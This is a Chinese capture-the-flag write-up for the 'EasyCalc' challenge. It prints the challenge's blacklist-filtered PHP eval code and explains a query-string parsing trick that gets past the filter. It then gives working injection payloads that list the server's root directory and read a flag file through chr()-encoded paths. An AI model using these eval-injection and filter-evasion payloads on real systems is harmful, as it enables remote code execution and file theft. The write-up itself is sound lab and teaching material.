17.EasyCalcS
查看源码,发现有段代码有php文件,即calc.php
经过代码审计之后应该要访问calc.php文件,打开后:
<?php
error_reporting(0);
if(!isset($_GET['num'])){
show_source(__FILE__);
}else{
$str = $_GET['num'];
$blacklist = [' ', '\t', '\r', '\n','\'', '"', '`', '\[', '\]','\$','\\','\^'];
foreach ($blacklist as $blackitem) {
if (preg_match('/' . $blackitem . '/m', $str)) {
die("what are you want to do?");
}
}
eval('echo '.$str.';');
}
?>可以看出原页面通过js将表达式传给calc.php,同时calc.php对传入的参数进行了一些限制后使用eval函数输出结果。
我们尝试了提交非数字的字符报错,我们审计代码后,发现可能是num变量被waf过滤了;
通过查阅资料我们可知这里需要利用php的字符串解析特性。
PHP会将查询字符串(在URL或正文中)转换为内部$_GET等关联数组。
/?foo=bar会变成Array([foo]=>"bar")在这个过程中某些字符会被删除或用下划线代替
/?%20news[id%00=42会变成Array([news_id] => 42)尝试扫描下这个文件下的包含文件
? num=1;var_dump(scandir(chr(47)))得到以下结果:
1array(24) { [0]=> string(1) "." [1]=> string(2) ".." [2]=> string(10) ".dockerenv" [3]=> string(3) "bin" [4]=> string(4) "boot" [5]=> string(3) "dev" [6]=> string(3) "etc" [7]=> string(5) "f1agg" [8]=> string(4) "home" [9]=> string(3) "lib" [10]=> string(5) "lib64" [11]=> string(5) "media" [12]=> string(3) "mnt" [13]=> string(3) "opt" [14]=> string(4) "proc" [15]=> string(4) "root" [16]=> string(3) "run" [17]=> string(4) "sbin" [18]=> string(3) "srv" [19]=> string(8) "start.sh" [20]=> string(3) "sys" [21]=> string(3) "tmp" [22]=> string(3) "usr" [23]=> string(3) "var" }有一个名叫f1agg的文件,感觉像是flag文件,我们尝试打开
? num=1;var_dump(file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103)))得到flag